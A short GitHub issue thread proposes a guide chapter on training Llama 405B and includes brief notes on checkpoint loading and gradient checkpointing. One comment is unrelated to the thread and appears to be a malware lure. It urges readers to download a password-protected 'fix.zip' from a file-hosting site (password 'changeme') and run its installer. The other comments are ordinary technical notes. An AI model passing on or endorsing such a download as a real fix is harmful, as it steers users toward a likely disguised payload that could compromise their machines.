### ISSUE TITLE
Add chapter on training llama 405b

### ISSUE THREAD

**Issue by corey-lambda** [LambdaLabsML/distributed-training-guide#17]
https://github.com/axolotl-ai-cloud/axolotl/blob/main/src/axolotl/cli/train.py

https://github.com/axolotl-ai-cloud/axolotl-cookbook/pull/1/files

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by corey-lambda** [comment]
WIll need to add details on how to load checkpoint with delayed initialization - likely need to use device_map="auto" & accelerate

**Comment by corey-lambda** [comment]
Add gradient checkpoint here as well
